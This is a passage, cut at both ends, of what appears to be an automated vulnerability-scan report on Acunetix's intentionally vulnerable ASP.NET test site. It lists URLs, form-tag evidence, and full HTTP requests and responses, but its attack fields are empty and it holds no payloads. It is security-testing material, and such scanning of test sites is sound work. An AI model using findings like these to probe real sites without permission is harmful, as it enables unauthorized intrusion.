value="/wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WBB8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT8fAAUSUmVhZE5ld3MuYXNweD9pZD0yZAIHDxYCHwEFrAIyMSBKdWx5IDIwMDUgLSBTdGFydC11cCBjb21wYW55IEFjdW5ldGl4IHJlbGVhc2VkIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXI6IGEgdG9vbCB0byBhdXRvbWF0aWNhbGx5IGF1ZGl0IHdlYnNpdGUgc2VjdXJpdHkuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgMiBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUsIGxhdW5jaGVzIHBvcHVsYXIgd2ViIGF0dGFja3MgKFNRTCBJbmplY3Rpb24gZXRjLikgYW5kIGlkZW50aWZpZXMgdnVsbmVyYWJpbGl0aWVzIHRoYXQgbmVlZCB0byBiZSBmaXhlZC5kZLQBJ3hOt3r5jKtYjVFFKdowCSWC" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWQKpxZClDQKAgcfvBQKFzrr8AQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBKShEjjcO8QZ+TqRo3QvanE8jv9G" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <a href="ReadNews.aspx?id=2" id="anchNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</a> <DIV id="divNewsShort" class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV> <div id="divComments">User comments: <table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0"> </table> </div> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea> <input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/Comments.aspx?id=3
Method	GET
Parameter
Attack
Evidence	<form name="Form1" method="post" action="Comments.aspx?id=3" id="Form1">
Show / hide Request and Response
Request Header - size: 330 bytes.	GET http://testaspnet.vulnweb.com/Comments.aspx?id=3 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 14066
Response Body - size: 14,066 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Comments</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Comments.aspx?id=3" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WBB8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhHwAFElJlYWROZXdzLmFzcHg/aWQ9M2QCBw8WAh8BBagBMjYgSmFudWFyeSAyMDA1IC0gQSBiZXRhIHZlcnNpb24gb2YgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciBoYXMgYmVlbiByZWxlYXNlZCB0b2RheS4gVGhlIGJldGEgaXMgYXZhaWxhYmxlIGZvciBkb3dubG9hZCBhdCBodHRwOi8vd3d3LmFjdW5ldGl4LmNvbS9kb3dubG9hZC8uZGQzP/MHHnstJY/fWtD4cYSdoYkheQ==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWQLj8dP9DwKAgcfvBQKFzrr8AQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBI1RRJ3EGUKdWdAQOQ9gMGQKbUn7" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:37:35 AM</DIV> <a href="ReadNews.aspx?id=3" id="anchNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a> <DIV id="divNewsShort" class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV> <div id="divComments">User comments: <table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0"> </table> </div> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea> <input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	GET
Parameter
Attack
Evidence	<form name="Form1" method="post" action="default.aspx" id="Form1">
Show / hide Request and Response
Request Header - size: 324 bytes.	GET http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 14064
Response Body - size: 14,064 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" 